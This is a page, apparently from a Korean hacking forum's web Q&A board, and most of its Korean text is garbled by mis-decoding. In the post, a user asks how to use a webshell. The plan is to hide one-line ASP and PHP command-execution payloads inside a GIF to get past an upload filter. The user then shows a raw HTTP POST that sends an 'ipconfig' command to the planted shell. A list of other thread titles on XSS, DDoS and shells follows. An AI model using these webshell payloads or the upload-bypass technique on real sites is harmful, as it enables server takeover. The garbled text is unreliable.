214, 3/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   stoopynice
   À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [º¹»ç]


±× ÆÄÀÏ ¾÷·Îµå ¿ìȸÇؼ­ (gif ÆÄÀÏ¿¡ ¾Æ·¡ Äڵ带 ³Ö¾î¼­)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
ÆäÀÌÁö¿¡ »ðÀÔÇÑ´ÙÀ½¿¡ ipconfig°°Àº ¸í·ÉÀ» ½ÇÇèÇغ¸°í ½ÍÀºµ¥
(À§¿¡ Äڵ尡 cmd ºÒ·¯¿Í¼­ cmd ¸í·ÉÇϴ°ÅÁÒ?)
Çǵ鷯¿¡ composer ÅÇ¿¡ ¾Æ·¡ ³»¿ë º¸³»¸é µÇ³ª¿ä??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

¿ä·±½ÄÀ¸·Î executeÇؼ­ Å×½ºÆ®ÇϸéµÇ³ª¿ä?

  Hit : 4671     Date : 2015/07/26 12:22



    
174   À¥ÇØÅ· ¹æ¹ý? Áú¹®ÇÕ´Ï´Ù.[1]     wilmamom
01/23 4895
173   shell ¿¡ ´ëÇØ ¼³¸íÁ» ÇØÁÖ¼¼¿ä![1]     v_0_0v_
06/04 3318
172   xss Áú¹®ÀÔ´Ï´Ù[1]     usj1004s
12/06 3069
171   À¥ ÇØÅ· Çϴµ¥ À¥ °³¹ßµµ ÇÒ ÁÙ ¾Ë¾Æ¾ß Çϳª¿ä?[1]     unmask
10/25 2782
170   ¸ÅÁ÷ÄõÅÍ ¿ìȸ ¹æ¹ý¿¡ ´ëÇØ Áú¹®µå¸³´Ï´Ù.[1]     tpdbs953
10/17 4863
169   ÇØÄ¿ °í¼öºÐµé ¼³¸íÁ» ºÎŹµå¸³´Ï´Ù.¤Ð¤Ð wpe-pro ÅäÅ©¿Â[2]     tjrqo12
10/13 7857
168   À̹ÌÁö¾È¿¡ ¸®´ÙÀÌ·ºÆ® ¼Ò½º(¾Ç¿ë¸ñÀûX)[2]     tjdgus1515
12/06 4621
167   XSS ÇØÅ· Áú¹®[3]     test11
03/07 4726
166   ȨÆäÀÌÁö µðµµ½º ¿ø¸®?[1]     tbxmaos
02/12 2652
165   level1¿¡¼­¿ä...[2]     studen1
06/05 3377
  À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.     stoopynice
07/26 4670
163   Paros Åø °ü·Ã Áú¹®[2]     stalaction
10/21 4938
162   ¼­¹ö½Ã°£ º¯°æ?[1]     stalaction
10/21 8202
161   서버시간 조작이 가능할까요?[1]     spe
01/07 3305
160   Áú¹®ÀÌ¿ä!![1]     sophiz
01/06 2886
159   »çÀÌÆ®¿¡ trojan ÀÌ ¹«´õ±â·Î ±ò·È½À´Ï´Ù, ¾î¶»°Ô Áö¿ö¾ß Çϳª¿ä?[1]     someone3
02/09 4024
158   À¥ÇØÅ· °ü·ÃÇÏ¿© Áú¹®µå¸³´Ï´Ù[5]     solo20
05/21 2348
157   CloudFlare ¾²´Â »çÀÌÆ®´Â ÇØÅ·Çϱâ Èûµé±î¿ä?[3]     sogreat
03/21 178
156   ÆäÀ̽ººÏ[1]     smile_mut
12/22 4127
155   ¿ÏÀüÃʺ¸¶ó ±Ã±ÝÇϳ׿ä À¥½© XSS µî[1]     sm8303
04/21 3758
[1][2] 3 [4][5][6][7][8][9][10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org